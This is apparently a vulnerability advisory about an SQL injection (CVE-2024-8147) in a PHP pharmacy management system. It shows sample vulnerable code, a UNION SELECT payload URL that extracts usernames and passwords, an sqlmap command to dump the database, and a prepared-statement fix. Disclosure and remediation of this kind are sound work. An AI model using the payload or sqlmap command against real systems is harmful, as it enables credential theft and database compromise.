CVE CyberSecurity Database News

CVE-2024-8147 - Critical SQL Injection in Pharmacy Management System 1. (code-projects) - Exploit and Details

Poster -

Summary:
A critical vulnerability (CVE-2024-8147) has been found in code-projects' Pharmacy Management System 1.. This issue is a classic SQL Injection that can let an attacker take full control over the database, including potentially accessing sensitive information, modifying data, and even achieving remote code execution in some environments.

This post explains the vulnerability, shows code samples, real exploit, and helps you understand what needs to be fixed. All information here is unique and written in simple American English.

Software affected: Pharmacy Management System 1. (code-projects)

- Vulnerable file: /index.php?action=editPharmacist

Type: SQL Injection

- CVE: CVE-2024-8147

What Happened?

In the Pharmacy Management System 1. web application, when editing a pharmacist, the page /index.php?action=editPharmacist reads the id parameter from the URL. This value is directly used in an SQL query—without any sanitization or parameterization.

This means: An attacker can tamper the id parameter and run their own SQL command!

Most PHP applications use code that looks like this

<?php
// Example: edit pharmacist
include("config.php");
$id = $_GET['id']; // user input
$query = "SELECT * FROM pharmacists WHERE id = $id";
$result = mysqli_query($conn, $query);
// ...
?>

The problem:
The $id value from the URL is simply placed into the SQL query string. If someone sets id like 1 OR 1=1, the whole table is exposed.

How to Exploit It (Proof of Concept)

An attacker can exploit the flaw by sending a specially crafted HTTP GET request.

Simple Exploit Example

Let's say the application is hosted at http://localhost/pharmacy/.

Malicious URL

http://localhost/pharmacy/index.php?action=editPharmacist&id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users--

id=1 is legitimate

- UNION SELECT 1,username,password,4,5 FROM users-- injects a second SELECT, returns user credentials

SQLMap can fully automate this

python3 sqlmap.py -u "http://localhost/pharmacy/index.php?action=editPharmacist&id=1" --cookie="PHPSESSID=..." --risk=3 --batch

This can dump the whole database, including passwords.

Public Disclosure & References

- Original Project
- CVE record (when published)
- Exploit Database entry (if available)
- SQL Injection Explanation (OWASP)

How to Fix

You must parametrize all SQL queries. Here’s a correct example using prepared statements in PHP:

<?php
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM pharmacists WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
?>

Stay up to date with CVEs and vulnerability advisories.

Thanks for reading! Stay secure and check your code for these classic mistakes.

Timeline

Published on: 08/25/2024 09:15:04 UTC
Last modified on: 09/11/2024 18:37:20 UTC